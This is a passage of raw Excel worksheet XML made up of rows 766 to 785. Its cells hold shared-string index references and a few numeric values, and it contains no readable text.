      <c r="D766" s="12" t="s">
        <v>28981</v>
      </c>
      <c r="E766" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F766" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G766" s="12" t="s">
        <v>5797</v>
      </c>
      <c r="H766" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I766" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J766" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K766" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L766" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M766" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N766" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O766" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P766" s="12" t="s">
        <v>4267</v>
      </c>
      <c r="Q766" s="12">
        <v>2.6</v>
      </c>
      <c r="R766" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S766" s="12" t="s">
        <v>5798</v>
      </c>
      <c r="T766" s="12" t="s">
        <v>4920</v>
      </c>
      <c r="U766" s="12" t="s">
        <v>5799</v>
      </c>
      <c r="V766" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W766" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X766" s="12">
        <v>10</v>
      </c>
      <c r="Y766" s="12" t="s">
        <v>5800</v>
      </c>
    </row>
    <row r="767" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A767" s="12">
        <v>3766</v>
      </c>
      <c r="B767" s="12" t="s">
        <v>29008</v>
      </c>
      <c r="C767" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D767" s="12" t="s">
        <v>29017</v>
      </c>
      <c r="F767" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G767" s="12" t="s">
        <v>5801</v>
      </c>
      <c r="H767" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I767" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J767" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K767" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L767" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M767" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N767" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O767" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P767" s="12" t="s">
        <v>5802</v>
      </c>
      <c r="Q767" s="12">
        <v>2.6</v>
      </c>
      <c r="R767" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S767" s="12" t="s">
        <v>5803</v>
      </c>
      <c r="T767" s="12" t="s">
        <v>5804</v>
      </c>
      <c r="U767" s="12" t="s">
        <v>5805</v>
      </c>
      <c r="V767" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W767" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X767" s="12">
        <v>5</v>
      </c>
      <c r="Y767" s="12" t="s">
        <v>5806</v>
      </c>
    </row>
    <row r="768" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A768" s="12">
        <v>3767</v>
      </c>
      <c r="B768" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D768" s="12" t="s">
        <v>29018</v>
      </c>
      <c r="E768" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F768" s="12" t="s">
        <v>28986</v>
      </c>
      <c r="G768" s="12" t="s">
        <v>5807</v>
      </c>
      <c r="H768" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I768" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J768" s="12" t="s">
        <v>23</v>
      </c>
      <c r="K768" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L768" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M768" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N768" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O768" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P768" s="12" t="s">
        <v>2288</v>
      </c>
      <c r="Q768" s="12">
        <v>2.4</v>
      </c>
      <c r="R768" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S768" s="12" t="s">
        <v>5808</v>
      </c>
      <c r="T768" s="12" t="s">
        <v>5524</v>
      </c>
      <c r="U768" s="12" t="s">
        <v>5809</v>
      </c>
      <c r="V768" s="12" t="s">
        <v>608</v>
      </c>
      <c r="W768" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X768" s="12">
        <v>9</v>
      </c>
      <c r="Y768" s="12" t="s">
        <v>5810</v>
      </c>
    </row>
    <row r="769" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A769" s="12">
        <v>3772</v>
      </c>
      <c r="B769" s="12" t="s">
        <v>28983</v>
      </c>
      <c r="C769" s="12" t="s">
        <v>29019</v>
      </c>
      <c r="D769" s="12" t="s">
        <v>28986</v>
      </c>
      <c r="F769" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G769" s="12" t="s">
        <v>5816</v>
      </c>
      <c r="H769" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I769" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J769" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K769" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L769" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M769" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N769" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O769" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P769" s="12" t="s">
        <v>5817</v>
      </c>
      <c r="Q769" s="12">
        <v>2.6</v>
      </c>
      <c r="R769" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S769" s="12" t="s">
        <v>5818</v>
      </c>
      <c r="T769" s="12" t="s">
        <v>5819</v>
      </c>
      <c r="U769" s="12" t="s">
        <v>5820</v>
      </c>
      <c r="V769" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W769" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X769" s="12">
        <v>28</v>
      </c>
      <c r="Y769" s="12" t="s">
        <v>5821</v>
      </c>
    </row>
    <row r="770" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A770" s="12">
        <v>3775</v>
      </c>
      <c r="B770" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D770" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E770" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F770" s="12" t="s">
        <v>29015</v>
      </c>
      <c r="G770" s="12" t="s">
        <v>5826</v>
      </c>
      <c r="H770" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I770" s="12" t="s">
        <v>145</v>
      </c>
      <c r="J770" s="12" t="s">
        <v>941</v>
      </c>
      <c r="K770" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L770" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M770" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N770" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O770" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P770" s="12" t="s">
        <v>5710</v>
      </c>
      <c r="Q770" s="12">
        <v>2.6</v>
      </c>
      <c r="R770" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S770" s="12" t="s">
        <v>5827</v>
      </c>
      <c r="T770" s="12" t="s">
        <v>5828</v>
      </c>
      <c r="U770" s="12" t="s">
        <v>5829</v>
      </c>
      <c r="V770" s="12" t="s">
        <v>1923</v>
      </c>
      <c r="W770" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X770" s="12">
        <v>4</v>
      </c>
      <c r="Y770" s="12" t="s">
        <v>5830</v>
      </c>
    </row>
    <row r="771" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A771" s="12">
        <v>3778</v>
      </c>
      <c r="B771" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D771" s="12" t="s">
        <v>29020</v>
      </c>
      <c r="E771" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F771" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G771" s="12" t="s">
        <v>5831</v>
      </c>
      <c r="H771" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I771" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J771" s="12" t="s">
        <v>103</v>
      </c>
      <c r="K771" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L771" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M771" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N771" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O771" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P771" s="12" t="s">
        <v>5604</v>
      </c>
      <c r="Q771" s="12">
        <v>2.6</v>
      </c>
      <c r="R771" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S771" s="12" t="s">
        <v>5832</v>
      </c>
      <c r="T771" s="12" t="s">
        <v>5833</v>
      </c>
      <c r="U771" s="12" t="s">
        <v>5834</v>
      </c>
      <c r="V771" s="12" t="s">
        <v>1174</v>
      </c>
      <c r="W771" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X771" s="12">
        <v>4</v>
      </c>
      <c r="Y771" s="12" t="s">
        <v>5835</v>
      </c>
    </row>
    <row r="772" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A772" s="12">
        <v>3802</v>
      </c>
      <c r="B772" s="12" t="s">
        <v>29016</v>
      </c>
      <c r="D772" s="12" t="s">
        <v>28981</v>
      </c>
      <c r="E772" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F772" s="12" t="s">
        <v>29015</v>
      </c>
      <c r="G772" s="12" t="s">
        <v>5843</v>
      </c>
      <c r="H772" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I772" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J772" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K772" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L772" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M772" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N772" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O772" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P772" s="12" t="s">
        <v>5844</v>
      </c>
      <c r="Q772" s="12">
        <v>2.6</v>
      </c>
      <c r="R772" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S772" s="12" t="s">
        <v>5845</v>
      </c>
      <c r="T772" s="12" t="s">
        <v>4695</v>
      </c>
      <c r="U772" s="12" t="s">
        <v>5846</v>
      </c>
      <c r="V772" s="12" t="s">
        <v>5847</v>
      </c>
      <c r="W772" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X772" s="12">
        <v>2</v>
      </c>
      <c r="Y772" s="12" t="s">
        <v>5848</v>
      </c>
    </row>
    <row r="773" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A773" s="12">
        <v>3803</v>
      </c>
      <c r="B773" s="12" t="s">
        <v>28375</v>
      </c>
      <c r="D773" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F773" s="12" t="s">
        <v>29763</v>
      </c>
      <c r="G773" s="12" t="s">
        <v>5849</v>
      </c>
      <c r="H773" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I773" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J773" s="12" t="s">
        <v>458</v>
      </c>
      <c r="K773" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L773" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M773" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N773" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O773" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P773" s="12" t="s">
        <v>5844</v>
      </c>
      <c r="Q773" s="12">
        <v>2.6</v>
      </c>
      <c r="R773" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S773" s="12" t="s">
        <v>5850</v>
      </c>
      <c r="T773" s="12" t="s">
        <v>4695</v>
      </c>
      <c r="U773" s="12" t="s">
        <v>5851</v>
      </c>
      <c r="V773" s="12" t="s">
        <v>5847</v>
      </c>
      <c r="W773" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X773" s="12">
        <v>2</v>
      </c>
      <c r="Y773" s="12" t="s">
        <v>5852</v>
      </c>
    </row>
    <row r="774" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A774" s="12">
        <v>3815</v>
      </c>
      <c r="B774" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D774" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F774" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G774" s="12" t="s">
        <v>5857</v>
      </c>
      <c r="H774" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I774" s="12" t="s">
        <v>27</v>
      </c>
      <c r="J774" s="12" t="s">
        <v>1314</v>
      </c>
      <c r="K774" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L774" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M774" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N774" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O774" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P774" s="12" t="s">
        <v>5858</v>
      </c>
      <c r="Q774" s="12">
        <v>2.6</v>
      </c>
      <c r="R774" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S774" s="12" t="s">
        <v>5859</v>
      </c>
      <c r="T774" s="12" t="s">
        <v>5860</v>
      </c>
      <c r="U774" s="12" t="s">
        <v>5861</v>
      </c>
      <c r="V774" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W774" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X774" s="12">
        <v>1</v>
      </c>
      <c r="Y774" s="12" t="s">
        <v>5862</v>
      </c>
    </row>
    <row r="775" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A775" s="12">
        <v>3823</v>
      </c>
      <c r="B775" s="12" t="s">
        <v>29021</v>
      </c>
      <c r="C775" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D775" s="12" t="s">
        <v>29022</v>
      </c>
      <c r="E775" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F775" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G775" s="12" t="s">
        <v>5863</v>
      </c>
      <c r="H775" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I775" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J775" s="12" t="s">
        <v>1446</v>
      </c>
      <c r="K775" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L775" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M775" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N775" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O775" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P775" s="12" t="s">
        <v>5604</v>
      </c>
      <c r="Q775" s="12">
        <v>2.6</v>
      </c>
      <c r="R775" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S775" s="12" t="s">
        <v>5864</v>
      </c>
      <c r="T775" s="12" t="s">
        <v>5865</v>
      </c>
      <c r="U775" s="12" t="s">
        <v>5866</v>
      </c>
      <c r="V775" s="12" t="s">
        <v>5867</v>
      </c>
      <c r="W775" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X775" s="12">
        <v>21</v>
      </c>
      <c r="Y775" s="12" t="s">
        <v>5868</v>
      </c>
    </row>
    <row r="776" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A776" s="12">
        <v>3825</v>
      </c>
      <c r="B776" s="12" t="s">
        <v>29008</v>
      </c>
      <c r="C776" s="12" t="s">
        <v>29023</v>
      </c>
      <c r="D776" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F776" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G776" s="12" t="s">
        <v>5870</v>
      </c>
      <c r="H776" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I776" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J776" s="12" t="s">
        <v>194</v>
      </c>
      <c r="K776" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L776" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M776" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N776" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O776" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P776" s="12" t="s">
        <v>4267</v>
      </c>
      <c r="Q776" s="12">
        <v>2.6</v>
      </c>
      <c r="R776" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S776" s="12" t="s">
        <v>5871</v>
      </c>
      <c r="T776" s="12" t="s">
        <v>4675</v>
      </c>
      <c r="U776" s="12" t="s">
        <v>5872</v>
      </c>
      <c r="V776" s="12" t="s">
        <v>197</v>
      </c>
      <c r="W776" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X776" s="12">
        <v>1</v>
      </c>
      <c r="Y776" s="12" t="s">
        <v>5873</v>
      </c>
    </row>
    <row r="777" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A777" s="12">
        <v>3849</v>
      </c>
      <c r="B777" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D777" s="12" t="s">
        <v>29024</v>
      </c>
      <c r="E777" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F777" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G777" s="12" t="s">
        <v>5880</v>
      </c>
      <c r="H777" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I777" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J777" s="12" t="s">
        <v>103</v>
      </c>
      <c r="K777" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L777" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M777" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N777" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O777" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P777" s="12" t="s">
        <v>4267</v>
      </c>
      <c r="Q777" s="12">
        <v>2.6</v>
      </c>
      <c r="R777" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S777" s="12" t="s">
        <v>5881</v>
      </c>
      <c r="T777" s="12" t="s">
        <v>5882</v>
      </c>
      <c r="U777" s="12" t="s">
        <v>5883</v>
      </c>
      <c r="V777" s="12" t="s">
        <v>1174</v>
      </c>
      <c r="W777" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X777" s="12">
        <v>2</v>
      </c>
      <c r="Y777" s="12" t="s">
        <v>5884</v>
      </c>
    </row>
    <row r="778" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A778" s="12">
        <v>3851</v>
      </c>
      <c r="B778" s="12" t="s">
        <v>29025</v>
      </c>
      <c r="D778" s="12" t="s">
        <v>29018</v>
      </c>
      <c r="E778" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F778" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G778" s="12" t="s">
        <v>5885</v>
      </c>
      <c r="H778" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I778" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J778" s="12" t="s">
        <v>181</v>
      </c>
      <c r="K778" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L778" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M778" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N778" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O778" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P778" s="12" t="s">
        <v>4267</v>
      </c>
      <c r="Q778" s="12">
        <v>2.6</v>
      </c>
      <c r="R778" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S778" s="12" t="s">
        <v>5886</v>
      </c>
      <c r="T778" s="12" t="s">
        <v>5879</v>
      </c>
      <c r="U778" s="12" t="s">
        <v>5887</v>
      </c>
      <c r="V778" s="12" t="s">
        <v>2398</v>
      </c>
      <c r="W778" s="12" t="s">
        <v>5888</v>
      </c>
      <c r="X778" s="12">
        <v>81</v>
      </c>
      <c r="Y778" s="12" t="s">
        <v>5889</v>
      </c>
    </row>
    <row r="779" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A779" s="12">
        <v>3869</v>
      </c>
      <c r="B779" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D779" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F779" s="12" t="s">
        <v>29763</v>
      </c>
      <c r="G779" s="12" t="s">
        <v>5898</v>
      </c>
      <c r="H779" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I779" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J779" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K779" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L779" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M779" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N779" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O779" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P779" s="12" t="s">
        <v>5899</v>
      </c>
      <c r="Q779" s="12">
        <v>2.6</v>
      </c>
      <c r="R779" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S779" s="12" t="s">
        <v>5900</v>
      </c>
      <c r="T779" s="12" t="s">
        <v>5901</v>
      </c>
      <c r="U779" s="12" t="s">
        <v>5902</v>
      </c>
      <c r="V779" s="12" t="s">
        <v>995</v>
      </c>
      <c r="W779" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X779" s="12">
        <v>8</v>
      </c>
      <c r="Y779" s="12" t="s">
        <v>5903</v>
      </c>
    </row>
    <row r="780" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A780" s="12">
        <v>3884</v>
      </c>
      <c r="B780" s="12" t="s">
        <v>29026</v>
      </c>
      <c r="D780" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F780" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G780" s="12" t="s">
        <v>5910</v>
      </c>
      <c r="H780" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I780" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J780" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K780" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L780" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M780" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N780" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O780" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P780" s="12" t="s">
        <v>5342</v>
      </c>
      <c r="Q780" s="12">
        <v>2.6</v>
      </c>
      <c r="R780" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S780" s="12" t="s">
        <v>5911</v>
      </c>
      <c r="T780" s="12" t="s">
        <v>5912</v>
      </c>
      <c r="U780" s="12" t="s">
        <v>5913</v>
      </c>
      <c r="V780" s="12" t="s">
        <v>2398</v>
      </c>
      <c r="W780" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X780" s="12">
        <v>3</v>
      </c>
      <c r="Y780" s="12" t="s">
        <v>5914</v>
      </c>
    </row>
    <row r="781" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A781" s="12">
        <v>3888</v>
      </c>
      <c r="B781" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D781" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F781" s="12" t="s">
        <v>29763</v>
      </c>
      <c r="G781" s="12" t="s">
        <v>5919</v>
      </c>
      <c r="H781" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I781" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J781" s="12" t="s">
        <v>3068</v>
      </c>
      <c r="K781" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L781" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M781" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N781" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O781" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P781" s="12" t="s">
        <v>5897</v>
      </c>
      <c r="Q781" s="12">
        <v>2.6</v>
      </c>
      <c r="R781" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S781" s="12" t="s">
        <v>5920</v>
      </c>
      <c r="T781" s="12" t="s">
        <v>5921</v>
      </c>
      <c r="U781" s="12" t="s">
        <v>5922</v>
      </c>
      <c r="V781" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W781" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X781" s="12">
        <v>1</v>
      </c>
      <c r="Y781" s="12" t="s">
        <v>5923</v>
      </c>
    </row>
    <row r="782" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A782" s="12">
        <v>3894</v>
      </c>
      <c r="B782" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C782" s="12" t="s">
        <v>28361</v>
      </c>
      <c r="D782" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E782" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F782" s="12" t="s">
        <v>29763</v>
      </c>
      <c r="G782" s="12" t="s">
        <v>5925</v>
      </c>
      <c r="H782" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I782" s="12" t="s">
        <v>925</v>
      </c>
      <c r="J782" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K782" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L782" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M782" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N782" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O782" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P782" s="12" t="s">
        <v>5897</v>
      </c>
      <c r="Q782" s="12">
        <v>2.6</v>
      </c>
      <c r="R782" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S782" s="12" t="s">
        <v>5926</v>
      </c>
      <c r="T782" s="12" t="s">
        <v>5927</v>
      </c>
      <c r="U782" s="12" t="s">
        <v>5928</v>
      </c>
      <c r="V782" s="12" t="s">
        <v>3883</v>
      </c>
      <c r="W782" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X782" s="12">
        <v>9</v>
      </c>
      <c r="Y782" s="12" t="s">
        <v>5929</v>
      </c>
    </row>
    <row r="783" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A783" s="12">
        <v>3900</v>
      </c>
      <c r="B783" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D783" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F783" s="12" t="s">
        <v>29027</v>
      </c>
      <c r="G783" s="12" t="s">
        <v>5936</v>
      </c>
      <c r="H783" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I783" s="12" t="s">
        <v>145</v>
      </c>
      <c r="J783" s="12" t="s">
        <v>941</v>
      </c>
      <c r="K783" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L783" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M783" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N783" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O783" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P783" s="12" t="s">
        <v>5924</v>
      </c>
      <c r="Q783" s="12">
        <v>2.6</v>
      </c>
      <c r="R783" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S783" s="12" t="s">
        <v>5937</v>
      </c>
      <c r="T783" s="12" t="s">
        <v>5938</v>
      </c>
      <c r="U783" s="12" t="s">
        <v>5939</v>
      </c>
      <c r="V783" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W783" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X783" s="12">
        <v>0</v>
      </c>
      <c r="Y783" s="12" t="s">
        <v>5940</v>
      </c>
    </row>
    <row r="784" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A784" s="12">
        <v>3912</v>
      </c>
      <c r="B784" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D784" s="12" t="s">
        <v>29028</v>
      </c>
      <c r="E784" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F784" s="12" t="s">
        <v>29029</v>
      </c>
      <c r="G784" s="12" t="s">
        <v>5941</v>
      </c>
      <c r="H784" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I784" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J784" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K784" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L784" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M784" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N784" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O784" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P784" s="12" t="s">
        <v>5875</v>
      </c>
      <c r="Q784" s="12">
        <v>2.6</v>
      </c>
      <c r="R784" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S784" s="12" t="s">
        <v>5942</v>
      </c>
      <c r="T784" s="12" t="s">
        <v>4104</v>
      </c>
      <c r="U784" s="12" t="s">
        <v>5943</v>
      </c>
      <c r="V784" s="12" t="s">
        <v>5207</v>
      </c>
      <c r="W784" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X784" s="12">
        <v>4</v>
      </c>
      <c r="Y784" s="12" t="s">
        <v>5944</v>
      </c>
    </row>
    <row r="785" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A785" s="12">
        <v>3960</v>
      </c>
